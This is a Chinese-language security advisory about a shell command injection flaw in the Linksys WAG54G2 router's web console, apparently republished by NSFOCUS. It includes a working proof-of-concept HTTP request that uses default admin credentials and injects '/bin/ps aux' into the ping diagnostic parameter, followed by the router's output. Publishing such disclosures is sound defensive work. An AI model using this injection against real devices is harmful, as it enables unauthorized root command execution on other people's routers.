安全研究

安全漏洞
Linksys WAG54G2 Web管理控制台远程Shell命令注入漏洞

发布日期:2009-05-15
更新日期:2009-06-02

受影响系统:
Linksys WAG54G2 1.0.10
描述:
BUGTRAQ  ID: 35142

Linksys WAG54G2是集成了modem和路由器的ADSL一体机。

Linksys WAG54G2路由器提供了一个默认仅有LAN用户可访问的管理控制台。由于没有正确地过滤用户请求中的“;”、“&”、“|”、“``”、“%a0”等特殊字符,用户在登录到控制台后提交恶意请求就可以导致注入并执行任意Shell命令。如果用户没有更改默认的管理口令,外网用户还可以利用跨站请求伪造攻击远程利用这个漏洞。

<*来源:Michal Sajdak (michal.sajdak@securitum.pl
  
  链接:http://milw0rm.com/exploits/8833
        http://www.securitum.pl/dh/Linksys_WAG54G2_-_escape_to_OS_root
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

GET /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;/bin/ps aux&message= HTTP/1.1
Host: 192.168.1.1
Authorization: Basic YWRtaW46YWRtaW4=

HTTP/1.0 200 OK
sh: cannot create 1: Unknown error 30
killall: pingmultilang: no process killed
killall: 2: no process killed
  PID  Uid     VmSize Stat Command
    1 root        284 S   init      
    2 root            SWN [ksoftirqd/0]
    3 root            SW< [events/0]
    4 root            SW< [khelper]
    5 root            SW< [kthread]
...

建议:
厂商补丁:

Linksys
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.linksys.com

浏览次数:3169
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障